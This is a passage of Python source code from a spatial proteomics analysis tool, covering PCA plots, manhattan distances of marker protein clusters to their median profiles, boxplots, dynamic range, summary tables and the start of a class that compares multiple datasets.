self.df_pca_combined = df_pca_combined.sort_index(level=["Gene names", "Compartment"])
map_names = self.map_names
df_pca_all_marker_cluster_maps = pd.DataFrame()
df_pca_filtered = df_pca.unstack("Map").dropna()
for clusters in markerproteins:
for marker in markerproteins[clusters]:
try:
plot_try_pca = df_pca_filtered.xs(marker, level="Gene names", drop_level=False)
except KeyError:
continue
df_pca_all_marker_cluster_maps = df_pca_all_marker_cluster_maps.append(
plot_try_pca)
if len(df_pca_all_marker_cluster_maps) == 0:
df_pca_all_marker_cluster_maps = df_pca_filtered.stack("Map")
else:
df_pca_all_marker_cluster_maps = df_pca_all_marker_cluster_maps.stack("Map")
self.df_pca_all_marker_cluster_maps = df_pca_all_marker_cluster_maps.sort_index(level=["Gene names", "Compartment"])
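# Usage sketch (hypothetical `ds`, assuming filtering/normalization has already been run):
#   ds.perform_pca()
#   ds.df_pca.head()           # per-map PCA coordinates ("PC1"-"PC3")
#   ds.df_pca_combined.head()  # PCA across the combined maps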
def plot_global_pca(self, map_of_interest="Map1", cluster_of_interest="Proteasome", x_PCA="PC1", y_PCA="PC3", collapse_maps=False):
""""
PCA plot will be generated
Args:
self:
df_organellarMarkerSet: df, columns: "Gene names", "Compartment", no index
df_pca: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3",
index: "Gene names", "Protein IDs", "C-Score", "Q-value", "Map", "Compartment",
Returns:
pca_figure: global PCA plot
"""
if collapse_maps == False:
df_global_pca = self.df_pca.unstack("Map").swaplevel(0,1, axis=1)[map_of_interest].reset_index()
else:
df_global_pca = self.df_pca_combined.reset_index()
for i in self.markerproteins[cluster_of_interest]:
df_global_pca.loc[df_global_pca["Gene names"] == i, "Compartment"] = "Selection"
compartments = self.df_organellarMarkerSet["Compartment"].unique()
compartment_color = dict(zip(compartments, self.css_color))
compartment_color["Selection"] = "black"
compartment_color["undefined"] = "lightgrey"
fig_global_pca = px.scatter(data_frame=df_global_pca,
x=x_PCA,
y=y_PCA,
color="Compartment",
color_discrete_map=compartment_color,
title= "Protein subcellular localization by PCA for {}".format(map_of_interest)
if collapse_maps == False else "Protein subcellular localization by PCA of combined maps",
hover_data=["Protein IDs", "Gene names", "Compartment"],
template="simple_white",
opacity=0.9
)
return fig_global_pca
def plot_cluster_pca(self, cluster_of_interest="Proteasome"):
"""
PCA plot will be generated
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
df_pca_all_marker_cluster_maps: PCA processed dataframe, containing the columns "PC1", "PC2", "PC3", filtered for marker genes, that are
consistent throughout all maps / coverage filtering.
Returns:
pca_figure: PCA plot, for one protein cluster all maps are plotted
"""
df_pca_all_marker_cluster_maps = self.df_pca_all_marker_cluster_maps
map_names = self.map_names
markerproteins = self.markerproteins
try:
for maps in map_names:
df_setofproteins_PCA = pd.DataFrame()
for marker in markerproteins[cluster_of_interest]:
try:
plot_try_pca = df_pca_all_marker_cluster_maps.xs((marker, maps), level=["Gene names", "Map"],
drop_level=False)
except KeyError:
continue
df_setofproteins_PCA = df_setofproteins_PCA.append(plot_try_pca)
df_setofproteins_PCA.reset_index(inplace=True)
if maps == map_names[0]:
pca_figure = go.Figure(
data=[go.Scatter3d(x=df_setofproteins_PCA.PC1,
y=df_setofproteins_PCA.PC2,
z=df_setofproteins_PCA.PC3,
hovertext=df_setofproteins_PCA["Gene names"],
mode="markers",
name=maps
)])
else:
pca_figure.add_trace(go.Scatter3d(x=df_setofproteins_PCA.PC1,
y=df_setofproteins_PCA.PC2,
z=df_setofproteins_PCA.PC3,
hovertext=df_setofproteins_PCA["Gene names"],
mode="markers",
name=maps
))
pca_figure.update_layout(autosize=False, width=500, height=500,
title="PCA plot for <br>the protein cluster: {}".format(cluster_of_interest),
template="simple_white")
return pca_figure
except:
return "This protein cluster was not quantified"
def calc_biological_precision(self):
"""
This function calculates the biological precision of all quantified protein clusters. It provides access to the data slice for all marker proteins, the distance profiles and the aggregated distances. It repeatedly applies the methods get_marker_proteins_unfiltered and calc_cluster_distances.
TODO: integrate optional arguments for calc_cluster_distances: complex_profile, distance_measure.
TODO: replace compatibility attributes with function return values and adjust attribute usage in downstream plotting functions.
Args:
self attributes:
markerproteins: dict, contains marker protein assignments
df_01_stacked: df, contains 0-1 normalized data, required for execution of get_marker_proteins_unfiltered
Returns:
df_alldistances_individual_mapfracunstacked: df, distance profiles, fully unstacked
df_alldistances_aggregated_mapunstacked: df, profile distances (manhattan distance by default), fully unstacked
df_allclusters_01_unfiltered_mapfracunstacked: df, collected marker protein data
self attributes:
df_distance_noindex: compatibility version of df_alldistances_aggregated_mapunstacked
df_allclusters_01_unfiltered_mapfracunstacked
df_allclusters_clusterdist_fracunstacked_unfiltered: compatibility version of df_allclusters_01_unfiltered_mapfracunstacked (only used by quantification_overview)
df_allclusters_clusterdist_fracunstacked: compatibility version of df_alldistances_individual_mapfracunstacked
genenames_sortedout_list: list of gene names with incomplete coverage
analysis_summary_dict entries:
"Manhattan distances" = df_distance_noindex
"Distances to the median profile": df_allclusters_clusterdist_fracunstacked, sorted and melted
"""
df_alldistances_individual_mapfracunstacked = pd.DataFrame()
df_alldistances_aggregated_mapunstacked = pd.DataFrame()
df_allclusters_01_unfiltered_mapfracunstacked = pd.DataFrame()
for cluster in self.markerproteins.keys():
# collect data irrespective of coverage
df_cluster_unfiltered = self.get_marker_proteins_unfiltered(cluster)
df_allclusters_01_unfiltered_mapfracunstacked = df_allclusters_01_unfiltered_mapfracunstacked.append(df_cluster_unfiltered)
# filter for coverage and calculate distances
df_cluster = df_cluster_unfiltered.dropna()
if len(df_cluster) == 0:
continue
df_distances_aggregated, df_distances_individual = self.calc_cluster_distances(df_cluster)
df_alldistances_individual_mapfracunstacked = df_alldistances_individual_mapfracunstacked.append(df_distances_individual)
df_alldistances_aggregated_mapunstacked = df_alldistances_aggregated_mapunstacked.append(df_distances_aggregated)
if len(df_alldistances_individual_mapfracunstacked) == 0:
self.df_distance_noindex = pd.DataFrame(columns = ["Gene names", "Map", "Cluster", "distance"])
self.df_allclusters_01_unfiltered_mapfracunstacked = pd.DataFrame(columns = ["Gene names", "Map", "Cluster", "distance"])
self.df_allclusters_clusterdist_fracunstacked_unfiltered = pd.DataFrame(columns = ["Fraction"])
self.df_allclusters_clusterdist_fracunstacked = pd.DataFrame(columns = ["Fraction"])
self.genenames_sortedout_list = "No clusters found"
return pd.DataFrame(), pd.DataFrame(), pd.DataFrame()
else:
df_alldistances_aggregated_mapunstacked.columns.name = "Map"
## Get compatibility with plotting functions, by mimicking assignment of old functions:
# old output of distance_calculation
self.df_distance_noindex = df_alldistances_aggregated_mapunstacked.stack("Map").reset_index().rename({0: "distance"}, axis=1)
self.analysis_summary_dict["Manhattan distances"] = self.df_distance_noindex.to_json()
# old output of multiple_iterations
# self.df_allclusters_clusterdist_fracunstacked_unfiltered --> this won't exist anymore, replaced by:
self.df_allclusters_01_unfiltered_mapfracunstacked = df_allclusters_01_unfiltered_mapfracunstacked
# kept for testing of quantification table:
self.df_allclusters_clusterdist_fracunstacked_unfiltered = df_allclusters_01_unfiltered_mapfracunstacked.stack("Map")
# same as before, but now already abs
self.df_allclusters_clusterdist_fracunstacked = df_alldistances_individual_mapfracunstacked.stack("Map")
df_dist_to_median = self.df_allclusters_clusterdist_fracunstacked.stack("Fraction")
df_dist_to_median.name = "distance"
df_dist_to_median = df_dist_to_median.reindex(index=natsort.natsorted(df_dist_to_median.index))
self.analysis_summary_dict["Distances to the median profile"] = df_dist_to_median.reset_index().to_json()
self.genenames_sortedout_list = [el for el in df_allclusters_01_unfiltered_mapfracunstacked.index.get_level_values("Gene names")
if el not in df_alldistances_individual_mapfracunstacked.index.get_level_values("Gene names")]
return df_alldistances_individual_mapfracunstacked, df_alldistances_aggregated_mapunstacked, df_allclusters_01_unfiltered_mapfracunstacked
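# Usage sketch (hypothetical `ds`):
#   dists_individual, dists_aggregated, clusters_01 = ds.calc_biological_precision()
#   # dists_aggregated holds one manhattan distance per protein and map; the same data is
#   # mirrored to ds.df_distance_noindex for the plotting functions defined below.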
def get_marker_proteins_unfiltered(self, cluster):
"""
This function retrieves the 0-1 normalized data for any given protein cluster, unfiltered for coverage.
Args:
cluster: str, cluster name, should be one of self.markerproteins.keys()
self attributes:
df_01_stacked: df, contains the fully stacked 0-1 normalized data
markerproteins: dict, contains marker protein assignments
Returns:
df_cluster_unfiltered: df, unfiltered data for the selected cluster, maps and fractions are unstacked.
self attributes:
None
"""
df_in = self.df_01_stacked["normalized profile"].unstack("Fraction")
markers = self.markerproteins[cluster]
# retrieve marker proteins
df_cluster_unfiltered = pd.DataFrame()
for marker in markers:
try:
df_p = df_in.xs(marker, level="Gene names", axis=0, drop_level=False)
except:
continue
df_cluster_unfiltered = df_cluster_unfiltered.append(df_p)
if len(df_cluster_unfiltered) == 0:
return df_cluster_unfiltered
# Unstack maps and add Cluster to index
df_cluster_unfiltered = df_cluster_unfiltered.unstack("Map")
df_cluster_unfiltered.set_index(pd.Index(np.repeat(cluster, len(df_cluster_unfiltered)), name="Cluster"), append=True, inplace=True)
return df_cluster_unfiltered
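# Usage sketch (hypothetical `ds`; the cluster name must be a key of ds.markerproteins):
#   df_proteasome = ds.get_marker_proteins_unfiltered("Proteasome")
#   # rows: marker proteins found in the data; columns: (Fraction, Map) MultiIndex of 0-1 normalized profiles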
def calc_cluster_distances(self, df_cluster, complex_profile=np.median, distance_measure="manhattan"):
"""
Calculates the absolute differences in each fraction and the profile distances relative to the center of a cluster.
By default this is the manhattan distance to the median profile.
Args:
df_cluster: df, 0-1 normalized profiles of cluster members, should already be filtered for full coverage and be in full wide format.
complex_profile: fun, function provided to apply for calculating the reference profile, default: np.median.
distance_measure: str, selected distance measure to calculate. Currently only 'manhattan' is supported, everything else raises a ValueError.
self attributes:
None
Returns:
df_distances_aggregated: df, proteins x maps; when stacked, the distance column is named 0 but contains manhattan distances.
df_distances_individual: df, same shape as df_cluster, but now with absolute differences to the reference.
self attributes:
None
"""
df_distances_aggregated = pd.DataFrame()
ref_profile = pd.DataFrame(df_cluster.apply(complex_profile, axis=0, result_type="expand")).T
df_distances_individual = df_cluster.apply(lambda x: np.abs(x-ref_profile.iloc[0,:]), axis=1)
# loop over maps
maps = set(df_cluster.columns.get_level_values("Map"))
for m in maps:
if distance_measure == "manhattan":
d_m = pw.manhattan_distances(df_cluster.xs(m, level="Map", axis=1), ref_profile.xs(m, level="Map", axis=1))
else:
raise ValueError(distance_measure)
d_m = pd.DataFrame(d_m, columns=[m], index=df_cluster.index)
df_distances_aggregated = pd.concat([df_distances_aggregated, d_m], axis=1)
df_distances_aggregated.columns.set_names(names="Map", inplace=True)
return df_distances_aggregated, df_distances_individual
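# Minimal numeric sketch of the distance calculation above (values are assumptions, not pipeline output):
# for one map with fractions [0.1, 0.4, 0.5] and a median reference profile of [0.2, 0.3, 0.5],
# the individual differences are [0.1, 0.1, 0.0] and the aggregated manhattan distance is
# |0.1-0.2| + |0.4-0.3| + |0.5-0.5| = 0.2, stored per protein and map in df_distances_aggregated.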
def profiles_plot(self, map_of_interest="Map1", cluster_of_interest="Proteasome"):
"""
The function allows the plotting of filtered and normalized spatial proteomic data using plotly.express.
The median profile is also calculated based on the overlapping proteins. Profiles of proteins that are not quantified in all maps are dashed.
Args:
map_of_interest: str, must be in self.map_names
cluster_of_interest: str, must be in self.markerproteins.keys()
self attributes:
df_allclusters_01_unfiltered_mapfracunstacked: df, contains 0-1 normalized profiles for all markerproteins detected in any map
Returns:
abundance_profiles_and_median_figure: plotly line plot, displaying the relative abundance profiles.
"""
try:
df_setofproteins = self.df_allclusters_01_unfiltered_mapfracunstacked.xs(cluster_of_interest, level="Cluster", axis=0)
df_setofproteins_median = df_setofproteins.dropna().xs(map_of_interest, level="Map", axis=1).median(axis=0)
# fractions get sorted
df_setofproteins = df_setofproteins.xs(map_of_interest, level="Map", axis=1).stack("Fraction")
df_setofproteins = df_setofproteins.reindex(index=natsort.natsorted(df_setofproteins.index))
df_setofproteins.name = "normalized profile"
# make it available for plotting
df_setofproteins = df_setofproteins.reindex(index=natsort.natsorted(df_setofproteins.index))
df_setofproteins = df_setofproteins.reset_index()
abundance_profiles_figure = px.line(df_setofproteins,
x="Fraction",
y="normalized profile",
color="Gene names",
line_group="Sequence" if "Sequence" in df_setofproteins.columns else "Gene names",
template="simple_white",
title="Relative abundance profile for {} of <br>the protein cluster: {}".format(map_of_interest, cluster_of_interest)
)
df_setofproteins_median.name = "normalized profile"
#fractions get sorted
df_setofproteins_median = df_setofproteins_median.reindex(index=natsort.natsorted(df_setofproteins_median.index))
# make it available for plotting
df_setofproteins_median = df_setofproteins_median.reset_index()
df_setofproteins_median.insert(0, "Gene names", np.repeat("Median profile", len(df_setofproteins_median)))
abundance_profiles_and_median_figure = abundance_profiles_figure.add_scatter(x=df_setofproteins_median["Fraction"],
y=df_setofproteins_median["normalized profile"],
name="Median profile"
)
# dash lines for proteins that have insufficient coverage across maps
abundance_profiles_and_median_figure.for_each_trace(lambda x: x.update(line={"dash":"dash"}),
selector=lambda x: x.name in self.genenames_sortedout_list)
return abundance_profiles_and_median_figure
except:
return "This protein cluster was not quantified"
def quantification_overview(self, cluster_of_interest="Proteasome"):
"""
Args:
self.df_allclusters_clusterdist_fracunstacked_unfiltered
columns: 01K, 03K, 06K, 12K, 24K, 80K
index: Gene names, Protein IDs, C-Score, Q-value, Map, Compartment, Cluster
Returns:
df
"""
df_quantification_overview = self.df_allclusters_clusterdist_fracunstacked_unfiltered.xs(cluster_of_interest, level="Cluster", axis=0)\
[self.fractions[0]].unstack("Map")
if "Sequence" in df_quantification_overview.index.names:
df_quantification_overview = df_quantification_overview.droplevel([i for i in df_quantification_overview.index.names if not i in ["Sequence","Gene names"]])
else:
df_quantification_overview = df_quantification_overview.droplevel([i for i in df_quantification_overview.index.names if not i=="Gene names"])
df_quantification_overview = df_quantification_overview.notnull().replace({True: "x", False: "-"})
return df_quantification_overview
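# Usage sketch (hypothetical `ds`): tabulate in which maps each cluster member was quantified
# ("x") or missing ("-"):
#   ds.quantification_overview("Proteasome")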
def distance_boxplot(self, cluster_of_interest="Proteasome"):
"""
A box plot for one selected cluster, across all maps, is generated, displaying the distribution of the e.g.
Manhattan distance.
Args:
self:
df_distance_noindex: stored as attribute (self.df_distance_noindex), index is reset.
It contains the column name "distance", in which the e.g. Manhattan distances for each individual protein
of the specified clusters (see self.markerproteins) are stored
map_names: individual map names are stored as an index
Returns:
distance_boxplot_figure: boxplot. Along the x-axis the maps, along the y-axis the distances are shown
"""
map_names = self.map_names
df_distance_noindex = self.df_distance_noindex
# "Gene names", "Map", "Cluster" and transferred into the index
df_distance_map_cluster_gene_in_index = df_distance_noindex.set_index(["Gene names", "Map", "Cluster"])
if "Sequence" in df_distance_map_cluster_gene_in_index.columns:
df_distance_map_cluster_gene_in_index.set_index("Sequence", append=True, inplace=True)
df_cluster_xmaps_distance_with_index = pd.DataFrame()
try:
# for each individual map and a defined cluster data will be extracted from the dataframe
# "df_distance_map_cluster_gene_in_index" and appended to the new dataframe df_cluster_xmaps_distance_with_index
for maps in map_names:
plot_try = df_distance_map_cluster_gene_in_index.xs((cluster_of_interest, maps),
level=["Cluster", "Map"], drop_level=False)
df_cluster_xmaps_distance_with_index = df_cluster_xmaps_distance_with_index.append(plot_try)
df_cluster_xmaps_distance_with_index["Combined Maps"] = "Combined Maps"
#number of proteins within one cluster
self.proteins_quantified_across_all_maps = df_cluster_xmaps_distance_with_index.unstack("Map").shape[0]
# index will be reset, required by px.box
df_cluster_xmaps_distance = df_cluster_xmaps_distance_with_index.reset_index()
distance_boxplot_figure = go.Figure()
distance_boxplot_figure.add_trace(go.Box(
x=df_cluster_xmaps_distance["Map"],
y=df_cluster_xmaps_distance["distance"],
boxpoints="all",
whiskerwidth=0.2,
marker_size=2,
hovertext=df_cluster_xmaps_distance["Gene names"]
))
distance_boxplot_figure.add_trace(go.Box(
x=df_cluster_xmaps_distance["Combined Maps"],
y=df_cluster_xmaps_distance["distance"],
boxpoints="all",
whiskerwidth=0.2,
marker_size=2,
hovertext=df_cluster_xmaps_distance["Gene names"]
))
distance_boxplot_figure.update_layout(
title="Manhattan distance distribution for <br>the protein cluster: {}".format(cluster_of_interest),
autosize=False,
showlegend=False,
width=500,
height=500,
# black box around the graph
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
title="Map",
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="distance",
mirror=True),
template="simple_white"
)
return distance_boxplot_figure
except:
self.cache_cluster_quantified = False
def distance_to_median_boxplot(self, cluster_of_interest="Proteasome"):
"""
A box plot for one selected cluster, across all maps and fractions, is generated, displaying the
distribution of the distance to the median. For each fraction, one box plot will be displayed.
Args:
self:
df_allclusters_clusterdist_fracunstacked, dataframe with single level column, stored as attribute
(self.allclusters_clusterdist_fracunstacked), in which "Fraction" is unstacked. It contains only the
normalized data of individual protein clusters, from which the median of the respective protein cluster was subtracted
for each fraction.
map_names: individual map names are stored as an index
Returns:
distance_to_median_boxplot_figure: Box plot. Along the x-axis, the maps are shown, along the y-axis
the distances are plotted
"""
df_boxplot_manymaps = pd.DataFrame()
try:
# for each individual map and a defined cluster data will be extracted from the dataframe
# "df_allclusters_clusterdist_fracunstacked" and appended to the new dataframe df_boxplot_manymaps
for maps in self.map_names:
plot_try = self.df_allclusters_clusterdist_fracunstacked.xs((cluster_of_interest, maps), level=["Cluster", "Map"], drop_level=False)
df_boxplot_manymaps = df_boxplot_manymaps.append(plot_try)
self.df_boxplot_manymaps = df_boxplot_manymaps
# index will be reset, required by px.violin
df_boxplot_manymaps = abs(df_boxplot_manymaps.stack("Fraction"))
df_boxplot_manymaps.name = "distance"
df_boxplot_manymaps = df_boxplot_manymaps.reindex(index=natsort.natsorted(df_boxplot_manymaps.index))
df_boxplot_manymaps = df_boxplot_manymaps.reset_index()
# box plot will be generated, every fraction will be displayed in a single plot
distance_to_median_boxplot_figure = px.box(df_boxplot_manymaps,
x="Map",
y="distance",
facet_col="Fraction",
facet_col_wrap=2,
boxmode="overlay", height=900, width=700, points="all",
hover_name="Gene names",
template="simple_white",
title="Distribution of the distance to the median for <br>the protein cluster: {}".format(cluster_of_interest))
return distance_to_median_boxplot_figure
except:
return "This protein cluster was not quantified"
def dynamic_range(self):
"""
Dynamic range of each individual protein cluster (of the median profile) across all maps is calculated.
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
df_01_stacked: "MAP" and "Fraction" are stacked; the data in the column "normalized profile" is used for plotting. Additionally the columns
"MS/MS count" and "Ratio H/L count | Ratio H/L variability [%] | Ratio H/L" are found in LFQ and SILAC data respectively
Returns:
self.analysis_summary_dict["Dynamic Range"]: json-serialized df, no index, columns: "Max", "Min", "Dynamic Range", "Cluster"
"""
df_setofproteins_allMaps = pd.DataFrame()
df_dynamicRange = pd.DataFrame()
df_01_stacked = self.df_01_stacked
for clusters in self.markerproteins:
try:
df_setofproteins_allMaps = pd.DataFrame()
for marker in self.markerproteins[clusters]:
try:
df_marker_allMaps = df_01_stacked.xs(marker, level="Gene names", drop_level=False)
except KeyError:
continue
df_setofproteins_allMaps = df_setofproteins_allMaps.append(df_marker_allMaps)
df_setofproteins_allMaps_median = df_setofproteins_allMaps["normalized profile"].unstack("Fraction").median()
df_dynamicRange = df_dynamicRange.append(pd.DataFrame(np.array([[max(df_setofproteins_allMaps_median),
min(df_setofproteins_allMaps_median),
max(df_setofproteins_allMaps_median)-min(df_setofproteins_allMaps_median),
clusters]]),
columns=["Max", "Min", "Dynamic Range", "Cluster"]),
ignore_index=True)
except:
continue
self.analysis_summary_dict["Dynamic Range"] = df_dynamicRange.to_json()
def plot_dynamic_range(self):
"""
Dynamic range of each individual protein cluster (of the median profile) across all maps is displayed.
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
df_01_stacked: "MAP" and "Fraction" are stacked; the data in the column "normalized profile" is used for plotting. Additionally the columns
"MS/MS count" and "Ratio H/L count | Ratio H/L variability [%] | Ratio H/L" are found in LFQ and SILAC data respectively
Returns:
fig_dynamicRange: Bar plot, displaying the dynamic range for each protein cluster
"""
fig_dynamicRange = px.bar(pd.read_json(self.analysis_summary_dict["Dynamic Range"]),
x="Cluster",
y="Dynamic Range",
base="Min",
template="simple_white",
width=1000,
height=500).update_xaxes(categoryorder="total ascending")
return fig_dynamicRange
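# Usage sketch (hypothetical `ds`): dynamic_range() has to be called first, since plot_dynamic_range()
# reads the json stored in analysis_summary_dict["Dynamic Range"]:
#   ds.dynamic_range()
#   fig_dr = ds.plot_dynamic_range()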
def results_overview_table(self):
"""
Dataframe will be created, that provides information about "range", "median" and "standardeviation",
given as the column names, based on the data given in df_distance_noindex
Args:
self:
df_distance_noindex: stored as attribute (self.df_distance_noindex), index is reset. It contains the column name "distance",
in which the e.g. Manhattan distances for each individual protein of the specified clusters (see self.markerproteins)
are stored
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...})
Returns:
df_overview: df, index: "Cluster", "Map"; columns: "range", "median", "standardeviation"; also stored as json in analysis_summary_dict["Overview table"]
"""
df_distance_noindex = self.df_distance_noindex
df_distance_map_cluster_gene_in_index = df_distance_noindex.set_index(["Gene names", "Map", "Cluster"])
map_names = self.map_names
df_overview = pd.DataFrame()
for clusters in self.markerproteins:
#if a certain cluster is not available in the dataset at all
try:
for maps in map_names:
df_dist_map_cluster = df_distance_map_cluster_gene_in_index.xs((clusters, maps), level=["Cluster", "Map"], drop_level=False)
statistic_table = {"range": (df_dist_map_cluster["distance"].max(axis=0)) - (df_dist_map_cluster["distance"].min(axis=0)),
"median": df_dist_map_cluster["distance"].median(axis=0),
"standardeviation": df_dist_map_cluster["distance"].std(axis=0),
"Cluster": clusters,
"Map": maps
}
statistic_series = pd.Series(data=statistic_table)
df_statistic_table_individual_cluster = pd.DataFrame(statistic_series).T
df_overview = df_overview.append(df_statistic_table_individual_cluster)
df_dist_cluster = df_distance_map_cluster_gene_in_index.xs(clusters, level="Cluster")
statistic_table_combined = {
"range": (df_dist_cluster["distance"].max(axis=0)) - (df_dist_cluster["distance"].min(axis=0)),
"median": df_dist_cluster["distance"].median(axis=0),
"standardeviation": df_dist_cluster["distance"].std(axis=0),
"Cluster": clusters,
"Map": "combined maps"
}
statistic_series_combined = pd.Series(data=statistic_table_combined)
df_statistic_table_individual_cluster = pd.DataFrame(statistic_series_combined).T
df_overview = df_overview.append(df_statistic_table_individual_cluster)
except:
continue
try:
df_overview.set_index(["Cluster", "Map"], inplace=True)
df_overview.sort_index(axis=0, level=0, inplace=True)
except:
df_overview = pd.DataFrame()
self.analysis_summary_dict["Overview table"] = df_overview.reset_index().to_json()
self.analysed_datasets_dict[self.expname] = self.analysis_summary_dict.copy()
#self.analysis_summary_dict.clear()
return df_overview
def reframe_df_01ORlog_for_Perseus(self, df_01ORlog):
""""
To be available for Perseus df_01_stacked needs to be reframed.
Args:
df_01ORlog: df, e.g. self.df_01_stacked or self.df_log_stacked; "Map" and "Fraction" are stacked in the index and will be fused
into a single "Map_Frac" column level for the wide output format
Returns:
df_01ORlog_svm:
LFQ:
columns: "MS/MS count_Map1_01K", "normalized profile_Map1_01K"
index: "Gene names", "Protein IDs", "C-Score", "Q-value", "Compartment"
SILAC:
columns: e.g. "Ratio H/L count_MAP2_80K", "Ratio H/L variability [%]_MAP1_03K", "normalized profile_MAP5_03K"
index: "Q-value", "Score", "Protein IDs", "Majority protein IDs", "Protein names", "Gene names", "id", "Compartment"
"""
df_01ORlog_svm = df_01ORlog.copy()
#df_01_filtered_combined = df_01_filtered_combined.stack(["Experiment", "Map"]).swaplevel(0,1, axis=0).dropna(axis=1)
index_ExpMap = df_01ORlog_svm.index.get_level_values("Map")+"_"+df_01ORlog_svm.index.get_level_values("Fraction")
index_ExpMap.name = "Map_Frac"
df_01ORlog_svm.set_index(index_ExpMap, append=True, inplace=True)
df_01ORlog_svm.index = df_01ORlog_svm.index.droplevel(["Map", "Fraction"])
df_01ORlog_svm = df_01ORlog_svm.unstack("Map_Frac")
#df_01ORlog_svm = df_01ORlog_svm.dropna(axis=0, subset=df_01ORlog_svm.loc[[], ["normalized profile"]].columns)
df_01ORlog_svm.columns = ["_".join(col) for col in df_01ORlog_svm.columns.values]
df_01ORlog_svm.rename(index={"undefined" : np.nan}, level="Compartment", inplace=True)
return df_01ORlog_svm
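# Usage sketch (hypothetical `ds`): export the 0-1 normalized data in a wide, Perseus-compatible layout;
# the output file name is an assumption for illustration only:
#   df_svm = ds.reframe_df_01ORlog_for_Perseus(ds.df_01_stacked)
#   df_svm.to_csv("perseus_input.tsv", sep="\t")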
class SpatialDataSetComparison:
analysed_datasets_dict = SpatialDataSet.analysed_datasets_dict
css_color = SpatialDataSet.css_color
cache_stored_SVM = True
def __init__(self, ref_exp="Exp2", **kwargs): #clusters_for_ranking=["Proteasome", "Lysosome"]
#self.clusters_for_ranking = clusters_for_ranking
self.ref_exp = ref_exp
self.json_dict = {}
#self.fractions, self.map_names = [], [] #self.df_01_stacked, self.df_log_stacked = pd.DataFrame(), pd.DataFrame()
#collapse_maps,collapse_cluster, cluster_of_interest_comparison, multi_choice, multi_choice_venn, x_PCA_comp, y_PCA_comp
#if "organism" not in kwargs.keys():
# self.markerproteins = self.markerproteins_set["Human - Swissprot"]
#else:
# assert kwargs["organism"] in self.markerproteins_set.keys()
# self.markerproteins = self.markerproteins_set[kwargs["organism"]]
# del kwargs["organism"]
#self.unique_proteins_total = unique_proteins_total
self.exp_names, self.exp_map_names = [], []
self.df_01_filtered_combined, self.df_distance_comp = pd.DataFrame(), pd.DataFrame()
self.df_quantity_pr_pg_combined, self.df_dynamicRange_combined = pd.DataFrame(), pd.DataFrame()
def read_jsonFile(self): #, content=None
"""
Read-out of the JSON-file and currently analysed dataset, stored in "analysed_datasets_dict". It will create df_distance_comp ("Gene
names", "Cluster" are stacked; "Map" and experiment names are unstacked; experiment names are not stored in an additional level name).
The layout will be adjusted for distance-plotting.
Args:
self.json_dict: contains the dictionary stored in AnalysedDatasets.json
{"Experiment name" : {
"changes in shape after filtering" : {
##SILAC##
"Original size" : tuple,
"Shape after categorical filtering" : tuple,
"Shape after Ratio H/L count (>= 3)/var (count>=2, var<30) filtering" : tuple,
"Shape after filtering for complete profiles" : tuple,
##LFQ/spectronaut##
"Original size" : tuple,
"Shape after MS/MS value filtering" : tuple,
"Shape after consecutive value filtering" : tuple,
},
"quantity: profiles/protein groups" : df - number of protein groups | number of profiles | data completeness of profiles
"Unique Proteins": list,
"Analysis parameters" : {
"acquisition" : str,
"filename" : str,
##SILAC##
"Ratio H/L count 1 (>= X)" : int,
"Ratio H/L count 2 (>=Y, var<Z)" : int,
"Ratio variability (<Z, count>=Y)" : int,
##LFQ/spectronaut##
"consecutive data points" : int,
"summed MS/MS counts" : int,
},
"0/1 normalized data - mean" : df - mean of all datapoints,
"0/1 normalized data" : df - individual cluster,
"Distances to the median profile" : df - individual cluster,
"Manhattan distances" : df - individual cluster,
"Dynamic Range": df - individual cluster,
"Overview table" : df - individual cluster,
##if the user performs the Misclassification Analysis before downloading the dictionary AnalysedDatasets.json##
{"Misclassification Analysis": {
"True: ER" : {
"Recall": int,
"FDR": int,
"Precision": int,
"F1": int
}
"True: NPC" : {...}
...
"Summary": {
"Total - Recall": int,
"Membrane - Recall" : int,
"Av per organelle - Recall": int,
"Median per organelle - Recall" : int,
"Av precision organelles" : int,
"Av F1 organelles" : int,
"Av F1 all clusters" : int,
}
}
}
}
Returns:
self:
df_01_filtered_combined: df, "Fraction" is unstacked; "Experiment", "Gene names", "Map", "Exp_Map" are stacked
df_distance_comp: df, no index, column names: "Gene names", "Cluster", "Protein IDs", "Compartment", "Experiment", "Map", "Exp_Map", "distance"
"distance": Manhattan distances for each individual protein of the specified clusters (see self.markerproteins) are stored
df_quantity_pr_pg_combined: df, no index, column names: "filtering", "type", "number of protein groups", "number of profiles",
"data completeness of profiles", "Experiment"
df_dynamicRange_combined: df, no index, column names: "Max", "Min", "Dynamic Range", "Cluster", "Experiment"
unique_proteins_total: dict, key: Experiment name, value: unique protein (groups)
exp_map_names: list of unique Exp_Map - fusions e.g. LFQ_Map1
exp_names: list of unique Experiment names - e.g. LFQ
"""
json_dict = self.json_dict
#add experiments that are not stored in AnalysedDatasets.json for comparison
#try:
#if len(SpatialDataSet.analysed_datasets_dict.keys())>=1:
# json_dict.update(SpatialDataSet.analysed_datasets_dict)
##except:
#else:
# pass
self.analysis_parameters_total = {}
unique_proteins_total = {}
df_01_combined = pd.DataFrame()
for exp_name in json_dict.keys():
for data_type in json_dict[exp_name].keys():
if data_type == "0/1 normalized data":
df_01_toadd = pd.read_json(json_dict[exp_name][data_type])
df_01_toadd.set_index(["Gene names", "Protein IDs", "Compartment"], inplace=True)
if "Sequence" in df_01_toadd.columns:
df_01_toadd.set_index(["Sequence"], inplace=True, append=True)
df_01_toadd.drop([col for col in df_01_toadd.columns if not col.startswith("normalized profile")], axis=1, inplace=True)
df_01_toadd.columns = pd.MultiIndex.from_tuples([el.split("?") for el in df_01_toadd.columns], names=["Set", "Map", "Fraction"])
df_01_toadd.rename(columns = {"normalized profile":exp_name}, inplace=True)
df_01_toadd.set_index(pd.Series(["?".join([str(i) for i in el]) for el in df_01_toadd.index.values], name="join"), append=True, inplace=True)
if len(df_01_combined) == 0:
df_01_combined = df_01_toadd.copy()
else:
df_01_combined = pd.concat([df_01_combined,df_01_toadd], sort=False, axis=1)
